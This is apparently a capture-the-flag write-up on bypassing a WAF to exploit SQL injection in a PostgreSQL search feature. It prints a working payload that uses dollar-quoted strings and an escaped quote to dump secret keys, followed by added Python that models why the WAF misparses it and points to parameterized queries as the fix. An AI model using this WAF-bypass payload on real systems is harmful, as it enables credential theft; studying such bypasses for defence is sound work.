Tags: sqli waf postgresql
Rating: 5.0
You can log in to the app by supplying any password and no username.
The application is a simple search feature that is vulnerable to SQL injection and sits behind a WAF.
I was able to bypass the WAF by using PostgreSQL custom strings (`$sth$string$sth$` is equal to `'string'`).
Payload: `name=';select+$a$sth$a$,string_agg(secret_key,',')+from+target_credentials+where+($x$12345\'$x$=$w$abcd$w$+or+1=1)+and+1!='2`

URL-decoded, the injected statement reads: `;select $a$sth$a$,string_agg(secret_key,',') from target_credentials where ($x$12345\'$x$=$w$abcd$w$ or 1=1) and 1!='2`
I confused the WAF with the additional escaped quote within the `$x$` string. It looks like the WAF sees the first part (before that escaped quote) as a string and therefore thinks that the query is safe.
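To make that explanation concrete, here is an added example (my own code, not the author's or the challenge's) that lexes the payload two ways: the way a naive quote-tracking filter would, and the way PostgreSQL actually does, with dollar-quoted literals. The surrounding application query and the keyword list are assumptions.

```python
import re

# Added example, not code from the writeup. It models the writeup's hypothesis:
# a WAF that tracks only single quotes and treats \' as an escape sees every
# payload keyword as "inside a string"; PostgreSQL's lexer, which knows
# $tag$...$tag$ literals (nothing is escaped inside them), sees the statement.
# PAYLOAD is the writeup's payload URL-decoded; FULL_QUERY is a hypothetical
# application query it lands in (assumed, not taken from the page).
KEYWORDS = {"select", "from", "where", "union", "or", "and"}
PAYLOAD = ("';select $a$sth$a$,string_agg(secret_key,',') from target_credentials"
           " where ($x$12345\\'$x$=$w$abcd$w$ or 1=1) and 1!='2")
FULL_QUERY = "select * from items where name = '" + PAYLOAD + "'"

def keywords_outside_strings(sql: str, pg_semantics: bool) -> list:
    """SQL keywords found outside string literals, in order of appearance.
    pg_semantics=False: '...' literals only, \\' is an escape (naive WAF view).
    pg_semantics=True : '...' literals where '' is the only escape, plus
    $tag$...$tag$ literals in which backslash and quote are plain characters."""
    found, i, n = [], 0, len(sql)
    while i < n:
        if sql[i] == "'":                                 # single-quoted literal
            i += 1
            while i < n:
                if sql[i] == "'":
                    if pg_semantics and sql.startswith("''", i):
                        i += 2                            # '' is an escaped quote
                        continue
                    break
                if not pg_semantics and sql[i] == "\\":
                    i += 1                                # naive: \' does not close
                i += 1
            i += 1                                        # skip the closing quote
        elif pg_semantics and (m := re.match(r"\$[A-Za-z_]*\$", sql[i:])):
            tag = m.group(0)                              # $tag$ ... $tag$ literal
            end = sql.find(tag, i + len(tag))
            i = n if end < 0 else end + len(tag)
        elif m := re.match(r"[A-Za-z_]\w*", sql[i:]):     # identifier or keyword
            if m.group(0).lower() in KEYWORDS:
                found.append(m.group(0).lower())
            i += len(m.group(0))
        else:
            i += 1                                        # punctuation, digit, space
    return found

if __name__ == "__main__":
    print("naive WAF view of payload:", keywords_outside_strings(PAYLOAD, False))
    print("same payload without \\':", keywords_outside_strings(PAYLOAD.replace("\\'", "'"), False))
    print("PostgreSQL view of full query:", keywords_outside_strings(FULL_QUERY, True))
```

The naive view reports no keywords for the payload but finds `or`/`and` once the `\'` is removed, which is exactly the pairing shift the writeup describes; a filter that lexes user input out of the query's context cannot reproduce the database's parse, so parameterized queries are the fix that does not depend on guessing the lexer.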